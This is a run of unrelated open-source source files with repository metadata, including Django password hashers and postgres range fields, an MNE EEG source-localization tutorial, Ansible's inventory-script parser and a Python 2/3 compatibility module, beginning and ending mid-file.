method') def safe_summary(self, encoded): """ Return a summary of safe values. The result is a dictionary and will be used where the password field must be displayed to construct a safe representation of the password. """ raise NotImplementedError('subclasses of BasePasswordHasher must provide a safe_summary() method') def must_update(self, encoded): return False def harden_runtime(self, password, encoded): """ Bridge the runtime gap between the work factor supplied in `encoded` and the work factor suggested by this hasher. Taking PBKDF2 as an example, if `encoded` contains 20000 iterations and `self.iterations` is 30000, this method should run password through another 10000 iterations of PBKDF2. Similar approaches should exist for any hasher that has a work factor. If not, this method should be defined as a no-op to silence the warning. 
""" warnings.warn('subclasses of BasePasswordHasher should provide a harden_runtime() method') class PBKDF2PasswordHasher(BasePasswordHasher): """ Secure password hashing using the PBKDF2 algorithm (recommended) Configured to use PBKDF2 + HMAC + SHA256. The result is a 64 byte binary string. Iterations may be changed safely but you must rename the algorithm if you change SHA256. """ algorithm = "pbkdf2_sha256" iterations = 100000 digest = hashlib.sha256 def encode(self, password, salt, iterations=None): assert password is not None assert salt and '$' not in salt if not iterations: iterations = self.iterations hash = pbkdf2(password, salt, iterations, digest=self.digest) hash = base64.b64encode(hash).decode('ascii').strip() return "%s$%d$%s$%s" % (self.algorithm, iterations, salt, hash) def verify(self, password, encoded): algorithm, iterations, salt, hash = encoded.split('$', 3) assert algorithm == self.algorithm encoded_2 = self.encode(password, salt, int(iterations)) return constant_time_compare(encoded, encoded_2) def safe_summary(self, encoded): algorithm, iterations, salt, hash = encoded.split('$', 3) assert algorithm == self.algorithm return OrderedDict([ (_('algorithm'), algorithm), (_('iterations'), iterations), (_('salt'), mask_hash(salt)), (_('hash'), mask_hash(hash)), ]) def must_update(self, encoded): algorithm, iterations, salt, hash = encoded.split('$', 3) return int(iterations) != self.iterations def harden_runtime(self, password, encoded): algorithm, iterations, salt, hash = encoded.split('$', 3) extra_iterations = self.iterations - int(iterations) if extra_iterations > 0: self.encode(password, salt, extra_iterations) class PBKDF2SHA1PasswordHasher(PBKDF2PasswordHasher): """ Alternate PBKDF2 hasher which uses SHA1, the default PRF recommended by PKCS #5. This is compatible with other implementations of PBKDF2, such as openssl's PKCS5_PBKDF2_HMAC_SHA1(). """ algorithm = "pbkdf2_sha1" digest = hashlib.sha1 class Argon2PasswordHasher(BasePasswordHasher): """ Secure password hashing using the argon2 algorithm. This is the winner of the Password Hashing Competition 2013-2015 (https://password-hashing.net). It requires the argon2-cffi library which depends on native C code and might cause portability issues. 
""" algorithm = 'argon2' library = 'argon2' time_cost = 2 memory_cost = 512 parallelism = 2 def encode(self, password, salt): argon2 = self._load_library() data = argon2.low_level.hash_secret( force_bytes(password), force_bytes(salt), time_cost=self.time_cost, memory_cost=self.memory_cost, parallelism=self.parallelism, hash_len=argon2.DEFAULT_HASH_LENGTH, type=argon2.low_level.Type.I, ) return self.algorithm + data.decode('ascii') def verify(self, password, encoded): argon2 = self._load_library() algorithm, rest = encoded.split('$', 1) assert algorithm == self.algorithm try: return argon2.low_level.verify_secret( force_bytes('$' + rest), force_bytes(password), type=argon2.low_level.Type.I, ) except argon2.exceptions.VerificationError: return False def safe_summary(self, encoded): (algorithm, variety, version, time_cost, memory_cost, parallelism, salt, data) = self._decode(encoded) assert algorithm == self.algorithm return OrderedDict([ (_('algorithm'), algorithm), (_('variety'), variety), (_('version'), version), (_('memory cost'), memory_cost), (_('time cost'), time_cost), (_('parallelism'), parallelism), (_('salt'), mask_hash(salt)), (_('hash'), mask_hash(data)), ]) def must_update(self, encoded): (algorithm, variety, version, time_cost, memory_cost, parallelism, salt, data) = self._decode(encoded) assert algorithm == self.algorithm argon2 = self._load_library() return ( argon2.low_level.ARGON2_VERSION != version or self.time_cost != time_cost or self.memory_cost != memory_cost or self.parallelism != parallelism ) def harden_runtime(self, password, encoded): # The runtime for Argon2 is too complicated to implement a sensible # hardening algorithm. pass def _decode(self, encoded): """ Split an encoded hash and return: ( algorithm, variety, version, time_cost, memory_cost, parallelism, salt, data, ). """ bits = encoded.split('$') if len(bits) == 5: # Argon2 < 1.3 algorithm, variety, raw_params, salt, data = bits version = 0x10 else: assert len(bits) == 6 algorithm, variety, raw_version, raw_params, salt, data = bits assert raw_version.startswith('v=') version = int(raw_version[len('v='):]) params = dict(bit.split('=', 1) for bit in raw_params.split(',')) assert len(params) == 3 and all(x in params for x in ('t', 'm', 'p')) time_cost = int(params['t']) memory_cost = int(params['m']) parallelism = int(params['p']) return ( algorithm, variety, version, time_cost, memory_cost, parallelism, salt, data, ) class BCryptSHA256PasswordHasher(BasePasswordHasher): """ Secure password hashing using the bcrypt algorithm (recommended) This is considered by many to be the most secure algorithm but you must first install the bcrypt library. Please be warned that this library depends on native C code and might cause portability issues. """ algorithm = "bcrypt_sha256" digest = hashlib.sha256 library = ("bcrypt", "bcrypt") rounds = 12 def salt(self): bcrypt = self._load_library() return bcrypt.gensalt(self.rounds) def encode(self, password, salt): bcrypt = self._load_library() # Hash the password prior to using bcrypt to prevent password # truncation as described in #20138. if self.digest is not None: # Use binascii.hexlify() because a hex encoded bytestring is str. 
password = binascii.hexlify(self.digest(force_bytes(password)).digest()) else: password = force_bytes(password) data = bcrypt.hashpw(password, salt) return "%s$%s" % (self.algorithm, force_text(data)) def verify(self, password, encoded): algorithm, data = encoded.split('$', 1) assert algorithm == self.algorithm encoded_2 = self.encode(password, force_bytes(data)) return constant_time_compare(encoded, encoded_2) def safe_summary(self, encoded): algorithm, empty, algostr, work_factor, data = encoded.split('$', 4) assert algorithm == self.algorithm salt, checksum = data[:22], data[22:] return OrderedDict([ (_('algorithm'), algorithm), (_('work factor'), work_factor), (_('salt'), mask_hash(salt)), (_('checksum'), mask_hash(checksum)), ]) def must_update(self, encoded): algorithm, empty, algostr, rounds, data = encoded.split('$', 4) return int(rounds) != self.rounds def harden_runtime(self, password, encoded): _, data = encoded.split('$', 1) salt = data[:29] # Length of the salt in bcrypt. rounds = data.split('$')[2] # work factor is logarithmic, adding one doubles the load. diff = 2**(self.rounds - int(rounds)) - 1 while diff > 0: self.encode(password, force_bytes(salt)) diff -= 1 class BCryptPasswordHasher(BCryptSHA256PasswordHasher): """ Secure password hashing using the bcrypt algorithm This is considered by many to be the most secure algorithm but you must first install the bcrypt library. Please be warned that this library depends on native C code and might cause portability issues. This hasher does not first hash the password which means it is subject to the 72 character bcrypt password truncation, most use cases should prefer the BCryptSHA256PasswordHasher. See: https://code.djangoproject.com/ticket/20138 """ algorithm = "bcrypt" digest = None class SHA1PasswordHasher(BasePasswordHasher): """ The SHA1 password hashing algorithm (not recommended) """ algorithm = "sha1" def encode(self, password, salt): assert password is not None assert salt and '$' not in salt hash = hashlib.sha1(force_bytes(salt + password)).hexdigest() return "%s$%s$%s" % (self.algorithm, salt, hash) def verify(self, password, encoded): algorithm, salt, hash = encoded.split('$', 2) assert algorithm == self.algorithm encoded_2 = self.encode(password, salt) return constant_time_compare(encoded, encoded_2) def safe_summary(self, encoded): algorithm, salt, hash = encoded.split('$', 2) assert algorithm == self.algorithm return OrderedDict([ (_('algorithm'), algorithm), (_('salt'), mask_hash(salt, show=2)), (_('hash'), mask_hash(hash)), ]) def harden_runtime(self, password, encoded): pass class MD5PasswordHasher(BasePasswordHasher): """ The Salted MD5 password hashing algorithm (not recommended) """ algorithm = "md5" def encode(self, password, salt): assert password is not None assert salt and '$' not in salt hash = hashlib.md5(force_bytes(salt + password)).hexdigest() return "%s$%s$%s" % (self.algorithm, salt, hash) def verify(self, password, encoded): algorithm, salt, hash = encoded.split('$', 2) assert algorithm == self.algorithm encoded_2 = self.encode(password, salt) return constant_time_compare(encoded, encoded_2) def safe_summary(self, encoded): algorithm, salt, hash = encoded.split('$', 2) assert algorithm == self.algorithm return OrderedDict([ (_('algorithm'), algorithm), (_('salt'), mask_hash(salt, show=2)), (_('hash'), mask_hash(hash)), ]) def harden_runtime(self, password, encoded): pass class UnsaltedSHA1PasswordHasher(BasePasswordHasher): """ Very insecure algorithm that you should *never* use; store SHA1 
hashes with an empty salt. This class is implemented because Django used to accept such password hashes. Some older Django installs still have these values lingering around so we need to handle and upgrade them properly. """ algorithm = "unsalted_sha1" def salt(self): return '' def encode(self, password, salt): assert salt == '' hash = hashlib.sha1(force_bytes(password)).hexdigest() return 'sha1$$%s' % hash def verify(self, password, encoded): encoded_2 = self.encode(password, '') return constant_time_compare(encoded, encoded_2) def safe_summary(self, encoded): assert encoded.startswith('sha1$$') hash = encoded[6:] return OrderedDict([ (_('algorithm'), self.algorithm), (_('hash'), mask_hash(hash)), ]) def harden_runtime(self, password, encoded): pass class UnsaltedMD5PasswordHasher(BasePasswordHasher): """ Incredibly insecure algorithm that you should *never* use; stores unsalted MD5 hashes without the algorithm prefix, also accepts MD5 hashes with an empty salt. This class is implemented because Django used to store passwords this way and to accept such password hashes. Some older Django installs still have these values lingering around so we need to handle and upgrade them properly. """ algorithm = "unsalted_md5" def salt(self): return '' def encode(self, password, salt): assert salt == '' return hashlib.md5(force_bytes(password)).hexdigest() def verify(self, password, encoded): if len(encoded) == 37 and encoded.startswith('md5$$'): encoded = encoded[5:] encoded_2 = self.encode(password, '') return constant_time_compare(encoded, encoded_2) def safe_summary(self, encoded): return OrderedDict([ (_('algorithm'), self.algorithm), (_('hash'), mask_hash(encoded, show=3)), ]) def harden_runtime(self, password, encoded): pass class CryptPasswordHasher(BasePasswordHasher): """ Password hashing using UNIX crypt (not recommended) The crypt module is not supported on all platforms. """ algorithm = "crypt" library = "crypt" def salt(self): return get_random_string(2) def encode(self, password, salt): crypt = self._load_library() assert len(salt) == 2 data = crypt.crypt(password, salt) assert data is not None # A platform like OpenBSD with a dummy crypt module. # we don't need to store the salt, but Django used to do this return "%s$%s$%s" % (self.algorithm, '', data) def verify(self, password, encoded): crypt = self._load_library() algorithm, salt, data = encoded.split('$', 2) assert algorithm == self.algorithm return constant_time_compare(data, crypt.crypt(password, data)) def safe_summary(self, encoded): algorithm, salt, data = encoded.split('$', 2) assert algorithm == self.algorithm return OrderedDict([ (_('algorithm'), algorithm), (_('salt'), salt), (_('hash'), mask_hash(data, show=3)), ]) def harden_runtime(self, password, encoded): pass
frdb194/django
refs/heads/master
django/contrib/postgres/forms/ranges.py
393
from psycopg2.extras import DateRange, DateTimeTZRange, NumericRange

from django import forms
from django.core import exceptions
from django.forms.widgets import MultiWidget
from django.utils.translation import ugettext_lazy as _

__all__ = ['IntegerRangeField', 'FloatRangeField', 'DateTimeRangeField', 'DateRangeField']


class BaseRangeField(forms.MultiValueField):
    default_error_messages = {
        'invalid': _('Enter two valid values.'),
        'bound_ordering': _('The start of the range must not exceed the end of the range.'),
    }

    def __init__(self, **kwargs):
        kwargs.setdefault('widget', RangeWidget(self.base_field.widget))
        kwargs.setdefault('fields', [self.base_field(required=False), self.base_field(required=False)])
        kwargs.setdefault('required', False)
        kwargs.setdefault('require_all_fields', False)
        super(BaseRangeField, self).__init__(**kwargs)

    def prepare_value(self, value):
        lower_base, upper_base = self.fields
        if isinstance(value, self.range_type):
            return [
                lower_base.prepare_value(value.lower),
                upper_base.prepare_value(value.upper),
            ]
        if value is None:
            return [
                lower_base.prepare_value(None),
                upper_base.prepare_value(None),
            ]
        return value

    def compress(self, values):
        if not values:
            return None
        lower, upper = values
        if lower is not None and upper is not None and lower > upper:
            raise exceptions.ValidationError(
                self.error_messages['bound_ordering'],
                code='bound_ordering',
            )
        try:
            range_value = self.range_type(lower, upper)
        except TypeError:
            raise exceptions.ValidationError(
                self.error_messages['invalid'],
                code='invalid',
            )
        else:
            return range_value


class IntegerRangeField(BaseRangeField):
    default_error_messages = {'invalid': _('Enter two whole numbers.')}
    base_field = forms.IntegerField
    range_type = NumericRange


class FloatRangeField(BaseRangeField):
    default_error_messages = {'invalid': _('Enter two numbers.')}
    base_field = forms.FloatField
    range_type = NumericRange


class DateTimeRangeField(BaseRangeField):
    default_error_messages = {'invalid': _('Enter two valid date/times.')}
    base_field = forms.DateTimeField
    range_type = DateTimeTZRange


class DateRangeField(BaseRangeField):
    default_error_messages = {'invalid': _('Enter two valid dates.')}
    base_field = forms.DateField
    range_type = DateRange


class RangeWidget(MultiWidget):
    def __init__(self, base_widget, attrs=None):
        widgets = (base_widget, base_widget)
        super(RangeWidget, self).__init__(widgets, attrs)

    def decompress(self, value):
        if value:
            return (value.lower, value.upper)
        return (None, None)
wmvanvliet/mne-python
refs/heads/master
tutorials/source-modeling/plot_eeg_mri_coords.py
10
# -*- coding: utf-8 -*- """ .. _tut-eeg-mri-coords: EEG source localization given electrode locations on an MRI =========================================================== This tutorial explains how to compute the forward operator from EEG data when the electrodes are in MRI voxel coordinates. """ # Authors: Eric Larson <larson.eric.d@gmail.com> # # License: BSD Style. import os.path as op import nibabel from nilearn.plotting import plot_glass_brain import numpy as np import mne from mne.channels import compute_native_head_t, read_custom_montage from mne.viz import plot_alignment ############################################################################## # Prerequisites # ------------- # For this we will assume that you have: # # - raw EEG data # - your subject's MRI reconstrcted using FreeSurfer # - an appropriate boundary element model (BEM) # - an appropriate source space (src) # - your EEG electrodes in Freesurfer surface RAS coordinates, stored # in one of the formats :func:`mne.channels.read_custom_montage` supports # # Let's set the paths to these files for the ``sample`` dataset, including # a modified ``sample`` MRI showing the electrode locations plus a ``.elc`` # file corresponding to the points in MRI coords (these were `synthesized # <https://gist.github.com/larsoner/0ac6fad57e31cb2d9caa77350a9ff366>`__, # and thus are stored as part of the ``misc`` dataset). data_path = mne.datasets.sample.data_path() subjects_dir = op.join(data_path, 'subjects') fname_raw = op.join(data_path, 'MEG', 'sample', 'sample_audvis_raw.fif') bem_dir = op.join(subjects_dir, 'sample', 'bem') fname_bem = op.join(bem_dir, 'sample-5120-5120-5120-bem-sol.fif') fname_src = op.join(bem_dir, 'sample-oct-6-src.fif') misc_path = mne.datasets.misc.data_path() fname_T1_electrodes = op.join(misc_path, 'sample_eeg_mri', 'T1_electrodes.mgz') fname_mon = op.join(misc_path, 'sample_eeg_mri', 'sample_mri_montage.elc') ############################################################################## # Visualizing the MRI # ------------------- # Let's take our MRI-with-eeg-locations and adjust the affine to put the data # in MNI space, and plot using :func:`nilearn.plotting.plot_glass_brain`, # which does a maximum intensity projection (easy to see the fake electrodes). # This plotting function requires data to be in MNI space. # Because ``img.affine`` gives the voxel-to-world (RAS) mapping, if we apply a # RAS-to-MNI transform to it, it becomes the voxel-to-MNI transformation we # need. Thus we create a "new" MRI image in MNI coordinates and plot it as: img = nibabel.load(fname_T1_electrodes) # original subject MRI w/EEG ras_mni_t = mne.transforms.read_ras_mni_t('sample', subjects_dir) # from FS mni_affine = np.dot(ras_mni_t['trans'], img.affine) # vox->ras->MNI img_mni = nibabel.Nifti1Image(img.dataobj, mni_affine) # now in MNI coords! plot_glass_brain(img_mni, cmap='hot_black_bone', threshold=0., black_bg=True, resampling_interpolation='nearest', colorbar=True) ########################################################################## # Getting our MRI voxel EEG locations to head (and MRI surface RAS) coords # ------------------------------------------------------------------------ # Let's load our :class:`~mne.channels.DigMontage` using # :func:`mne.channels.read_custom_montage`, making note of the fact that # we stored our locations in Freesurfer surface RAS (MRI) coordinates. # # .. collapse:: |question| What if my electrodes are in MRI voxels? 
# :class: info # # If you have voxel coordinates in MRI voxels, you can transform these to # FreeSurfer surface RAS (called "mri" in MNE) coordinates using the # transformations that FreeSurfer computes during reconstruction. # ``nibabel`` calls this transformation the ``vox2ras_tkr`` transform # and operates in millimeters, so we can load it, convert it to meters, # and then apply it:: # # >>> pos_vox = ... # loaded from a file somehow # >>> img = nibabel.load(fname_T1) # >>> vox2mri_t = img.header.get_vox2ras_tkr() # voxel -> mri trans # >>> pos_mri = mne.transforms.apply_trans(vox2mri_t, pos_vox) # >>> pos_mri /= 1000. # mm -> m # # You can also verify that these are correct (or manually convert voxels # to MRI coords) by looking at the points in Freeview or tkmedit. dig_montage = read_custom_montage(fname_mon, head_size=None, coord_frame='mri') dig_montage.plot() ############################################################################## # We can then get our transformation from the MRI coordinate frame (where our # points are defined) to the head coordinate frame from the object. trans = compute_native_head_t(dig_montage) print(trans) # should be mri->head, as the "native" space here is MRI ############################################################################## # Let's apply this digitization to our dataset, and in the process # automatically convert our locations to the head coordinate frame, as # shown by :meth:`~mne.io.Raw.plot_sensors`. raw = mne.io.read_raw_fif(fname_raw) raw.pick_types(meg=False, eeg=True, stim=True, exclude=()).load_data() raw.set_montage(dig_montage) raw.plot_sensors(show_names=True) ############################################################################## # Now we can do standard sensor-space operations like make joint plots of # evoked data. raw.set_eeg_reference(projection=True) events = mne.find_events(raw) epochs = mne.Epochs(raw, events) cov = mne.compute_covariance(epochs, tmax=0.) evoked = epochs['1'].average() # trigger 1 in auditory/left evoked.plot_joint() ############################################################################## # Getting a source estimate # ------------------------- # New we have all of the components we need to compute a forward solution, # but first we should sanity check that everything is well aligned: fig = plot_alignment( evoked.info, trans=trans, show_axes=True, surfaces='head-dense', subject='sample', subjects_dir=subjects_dir) ############################################################################## # Now we can actually compute the forward: fwd = mne.make_forward_solution( evoked.info, trans=trans, src=fname_src, bem=fname_bem, verbose=True) ############################################################################## # Finally let's compute the inverse and apply it: inv = mne.minimum_norm.make_inverse_operator( evoked.info, fwd, cov, verbose=True) stc = mne.minimum_norm.apply_inverse(evoked, inv) brain = stc.plot(subjects_dir=subjects_dir, initial_time=0.1)
pwoodworth/intellij-community
refs/heads/master
python/testData/mover/simple.py
83
a =<caret> 1
b = 2
joshzarrabi/e-mission-server
refs/heads/master
emission/analysis/modelling/tour_model/tour_model.py
2
# Our imports import emission.simulation.markov_model_counter as esmmc ## A File meant to represent tour models for individual users ## A tour model is a week of each users most popular travel destinations # Monday # >>> home_start_mon = Location("home", 0, 0) # >>> work_1_mon = Location("work_1", 8, 0) # >>> coffee_mon = Location("coffee", 10, 0) # >>> lunch_mon = Location("lunch", 12, 0) # >>> work_2_mon = Location("work", 13, 0) # >>> home_end_mon = Location("home", 18, 0) # >>> home_start_mon.add_successors({work_1_mon : 1}) # >>> work_1_mon.add_successors({coffee_mon : 2}) # >>> coffee_mon.add_successors({lunch_mon : 3}) # >>> lunch_mon.add_successors({work_2_mon : 4}) ## Completes the cycle # >>> work_2_mon.add_successors({home_end_mon : 100}) # Tuesday # >>> home_start_tues = Location("home", 0, 1) # >>> work_1_tues = Location("work_1", 8, 1) # >>> coffee_tues = Location("coffee", 10, 1) # >>> lunch_tues = Location("lunch", 12, 1) # >>> work_2_tues = Location("work", 13, 1) # >>> home_end_tues = Location("home", 18, 1) # >>> home_start_tues.add_successors({work_1_tues : 1}) # >>> work_1_tues.add_successors({coffee_tues : 2}) # >>> coffee_tues.add_successors({lunch_tues : 3}) # >>> lunch_tues.add_successors({work_2_tues : 4}) ## Completes the cycle # >>> work_2_tues.add_successors({home_end_tues : 100}) # >>> mon = Day(0, home_start_mon) # >>> tues = Day(1, home_start_tues) # >>> days = [mon, tues] # >>> week = TourModel("naomi", days) # >>> tm_for_week = week.build_tour_model() # I know this seems like alot, but you shouldnt really be typing any of this out by hand # Maybe there is a better way to do this... class Location(object): def __init__(self, name, hour, day): self.hour = hour ## An int 0-23 representing the hour self.name = name ## The name of the place, important for equality self.day = day ## 0-6 Monday-Sunday self.counter = esmmc.Counter( ) ## Reps successors and probabilities of each one def add_successors(self, suc_dict): for loc, weight in suc_dict.iteritems(): if (loc.hour < self.hour) or (loc.day < self.day): raise Exception("You can not go backwards in time!") self.counter[loc] = weight def get_successor(self): return esmmc.sampleFromCounter(self.counter) def is_end(self): return self.counter.totalCount() == 0 def __eq__(self, other): return (self.name == other.name) and (self.day == other.day) def __ne__(self, other): return not self == other def __repr__(self): return self.name def __str__(self): return "At %s, at hour, %s on day %s" % (self.name, self.hour, self.day) class Day(object): """ Represents a day of a tour, full of locations """ def __init__(self, num_day, starting_point): self.day = num_day self.starting_point = starting_point def get_tour_model(self): tour_model = [ ] curr_node = self.starting_point tour_model.append(curr_node) while not curr_node.is_end(): curr_node = curr_node.get_successor() tour_model.append(curr_node) return tour_model class TourModel(object): """ A class that represents a canconical week of travel for a user of e-mission. """ def __init__(self, user, days): self.user = user self.days = days def build_tour_model(self): tour_model = [ ] for day in self.days: tour_model.append(day.get_tour_model()) return tour_model
imrehg/physicspy
refs/heads/master
setup.py
1
#!/usr/bin/env python """Physicspy: physics calculations in Python """ DOCLINES = __doc__.split("\n") import os from distutils.core import setup # BEFORE importing distutils, remove MANIFEST. distutils doesn't properly # update it when the contents of directories change. if os.path.exists('MANIFEST'): os.remove('MANIFEST') def setup_package(): from distutils.core import setup try: setup(name='physicspy', author = 'Gergely Imreh', author_email = 'imrehg@gmail.com', version = '0.1.0', description = DOCLINES[0], long_description = "\n".join(DOCLINES[2:]), url = 'http://github.com/imrehg/physicspy/', license = 'MIT', platforms = ["Windows", "Linux", "Solaris", "Mac OS-X", "Unix"], packages = ['physicspy','physicspy.optics','physicspy.quantum']) finally: pass return if __name__ == '__main__': setup_package()
GoogleCloudPlatform/training-data-analyst
refs/heads/master
courses/machine_learning/deepdive2/building_production_ml_systems/labs/taxifare/trainer/task.py
4
import argparse from trainer import model if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument( "--batch_size", help="Batch size for training steps", type=int, default=32 ) parser.add_argument( "--eval_data_path", help="GCS location pattern of eval files", required=True ) parser.add_argument( "--nnsize", help="Hidden layer sizes (provide space-separated sizes)", nargs="+", type=int, default=[32, 8] ) parser.add_argument( "--nbuckets", help="Number of buckets to divide lat and lon with", type=int, default=10 ) parser.add_argument( "--lr", help = "learning rate for optimizer", type = float, default = 0.001 ) parser.add_argument( "--num_evals", help="Number of times to evaluate model on eval data training.", type=int, default=5 ) parser.add_argument( "--num_examples_to_train_on", help="Number of examples to train on.", type=int, default=100 ) parser.add_argument( "--output_dir", help="GCS location to write checkpoints and export models", required=True ) parser.add_argument( "--train_data_path", help="GCS location pattern of train files containing eval URLs", required=True ) parser.add_argument( "--job-dir", help="this model ignores this field, but it is required by gcloud", default="junk" ) args = parser.parse_args() hparams = args.__dict__ hparams.pop("job-dir", None) model.train_and_evaluate(hparams)
alexanderturner/ansible
refs/heads/devel
lib/ansible/inventory/script.py
26
# (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. ############################################# from __future__ import (absolute_import, division, print_function) __metaclass__ = type import os import subprocess import sys from collections import Mapping from ansible.compat.six import iteritems from ansible import constants as C from ansible.errors import AnsibleError from ansible.inventory.host import Host from ansible.inventory.group import Group from ansible.module_utils.basic import json_dict_bytes_to_unicode from ansible.module_utils._text import to_native, to_text class InventoryScript: ''' Host inventory parser for ansible using external inventory scripts. ''' def __init__(self, loader, groups=None, filename=C.DEFAULT_HOST_LIST): if groups is None: groups = dict() self._loader = loader self.groups = groups # Support inventory scripts that are not prefixed with some # path information but happen to be in the current working # directory when '.' is not in PATH. self.filename = os.path.abspath(filename) cmd = [ self.filename, "--list" ] try: sp = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE) except OSError as e: raise AnsibleError("problem running %s (%s)" % (' '.join(cmd), e)) (stdout, stderr) = sp.communicate() if sp.returncode != 0: raise AnsibleError("Inventory script (%s) had an execution error: %s " % (filename,stderr)) # make sure script output is unicode so that json loader will output # unicode strings itself try: self.data = to_text(stdout, errors="strict") except Exception as e: raise AnsibleError("inventory data from {0} contained characters that cannot be interpreted as UTF-8: {1}".format(to_native(self.filename), to_native(e))) # see comment about _meta below self.host_vars_from_top = None self._parse(stderr) def _parse(self, err): all_hosts = {} # not passing from_remote because data from CMDB is trusted try: self.raw = self._loader.load(self.data) except Exception as e: sys.stderr.write(to_native(err) + "\n") raise AnsibleError("failed to parse executable inventory script results from {0}: {1}".format(to_native(self.filename), to_native(e))) if not isinstance(self.raw, Mapping): sys.stderr.write(to_native(err) + "\n") raise AnsibleError("failed to parse executable inventory script results from {0}: data needs to be formatted as a json dict".format(to_native(self.filename))) group = None for (group_name, data) in self.raw.items(): # in Ansible 1.3 and later, a "_meta" subelement may contain # a variable "hostvars" which contains a hash for each host # if this "hostvars" exists at all then do not call --host for each # host. This is for efficiency and scripts should still return data # if called with --host for backwards compat with 1.2 and earlier. 
if group_name == '_meta': if 'hostvars' in data: self.host_vars_from_top = data['hostvars'] continue if group_name not in self.groups: group = self.groups[group_name] = Group(group_name) group = self.groups[group_name] host = None if not isinstance(data, dict): data = {'hosts': data} # is not those subkeys, then simplified syntax, host with vars elif not any(k in data for k in ('hosts','vars','children')): data = {'hosts': [group_name], 'vars': data} if 'hosts' in data: if not isinstance(data['hosts'], list): raise AnsibleError("You defined a group \"%s\" with bad " "data for the host list:\n %s" % (group_name, data)) for hostname in data['hosts']: if hostname not in all_hosts: all_hosts[hostname] = Host(hostname) host = all_hosts[hostname] group.add_host(host) if 'vars' in data: if not isinstance(data['vars'], dict): raise AnsibleError("You defined a group \"%s\" with bad " "data for variables:\n %s" % (group_name, data)) for k, v in iteritems(data['vars']): group.set_variable(k, v) # Separate loop to ensure all groups are defined for (group_name, data) in self.raw.items(): if group_name == '_meta': continue if isinstance(data, dict) and 'children' in data: for child_name in data['children']: if child_name in self.groups: self.groups[group_name].add_child_group(self.groups[child_name]) # Finally, add all top-level groups as children of 'all'. # We exclude ungrouped here because it was already added as a child of # 'all' at the time it was created. for group in self.groups.values(): if group.depth == 0 and group.name not in ('all', 'ungrouped'): self.groups['all'].add_child_group(group) def get_host_variables(self, host): """ Runs <script> --host <hostname> to determine additional host variables """ if self.host_vars_from_top is not None: try: got = self.host_vars_from_top.get(host.name, {}) except AttributeError as e: raise AnsibleError("Improperly formatted host information for %s: %s" % (host.name,to_native(e))) return got cmd = [self.filename, "--host", host.name] try: sp = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE) except OSError as e: raise AnsibleError("problem running %s (%s)" % (' '.join(cmd), e)) (out, err) = sp.communicate() if out.strip() == '': return dict() try: return json_dict_bytes_to_unicode(self._loader.load(out)) except ValueError: raise AnsibleError("could not parse post variable response: %s, %s" % (cmd, out))
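# A minimal sketch of the JSON an external inventory script is expected to
# print for ``--list`` (hypothetical hosts and groups), matching the parsing
# above: each group maps to "hosts"/"vars"/"children", and the optional
# "_meta"/"hostvars" block lets Ansible skip the per-host ``--host`` calls.
import json

example_inventory = {
    "web": {"hosts": ["web1.example.com"], "vars": {"http_port": 80}},
    "db": {"hosts": ["db1.example.com"]},
    "all_servers": {"children": ["web", "db"]},
    "_meta": {"hostvars": {"web1.example.com": {"ansible_user": "deploy"}}},
}
print(json.dumps(example_inventory))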
lisongmin/pies
refs/heads/develop
pies/overrides.py
2
"""pies/overrides.py. Overrides Python syntax to conform to the Python3 version as much as possible using a '*' import Copyright (C) 2013 Timothy Edmund Crosley Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ from __future__ import absolute_import import abc import functools import sys from numbers import Integral from ._utils import unmodified_isinstance, with_metaclass from .version_info import PY2, PY3, VERSION native_dict = dict native_round = round native_filter = filter native_map = map native_zip = zip native_range = range native_str = str native_chr = chr native_input = input native_next = next native_object = object common = ['native_dict', 'native_round', 'native_filter', 'native_map', 'native_range', 'native_str', 'native_chr', 'native_input', 'PY2', 'PY3', 'u', 'itemsview', 'valuesview', 'keysview', 'execute', 'integer_types', 'native_next', 'native_object', 'with_metaclass'] if PY3: import urllib import builtins from urllib import parse from collections import OrderedDict integer_types = (int, ) def u(string): return string def itemsview(collection): return collection.items() def valuesview(collection): return collection.values() def keysview(collection): return collection.keys() urllib.quote = parse.quote urllib.quote_plus = parse.quote_plus urllib.unquote = parse.unquote urllib.unquote_plus = parse.unquote_plus urllib.urlencode = parse.urlencode execute = getattr(builtins, 'exec') if VERSION[1] < 2: def callable(entity): return hasattr(entity, '__call__') common.append('callable') __all__ = common + ['OrderedDict', 'urllib'] else: from itertools import ifilter as filter from itertools import imap as map from itertools import izip as zip from decimal import Decimal, ROUND_HALF_EVEN try: from collections import OrderedDict except ImportError: from ordereddict import OrderedDict import codecs str = unicode chr = unichr input = raw_input range = xrange integer_types = (int, long) import sys stdout = sys.stdout stderr = sys.stderr reload(sys) sys.stdout = stdout sys.stderr = stderr sys.setdefaultencoding('utf-8') def _create_not_allowed(name): def _not_allow(*args, **kwargs): raise NameError("name '{0}' is not defined".format(name)) _not_allow.__name__ = name return _not_allow for removed in ('apply', 'cmp', 'coerce', 'execfile', 'raw_input', 'unpacks'): globals()[removed] = _create_not_allowed(removed) def u(s): if isinstance(s, unicode): return s else: return unicode(s.replace(r'\\', r'\\\\'), 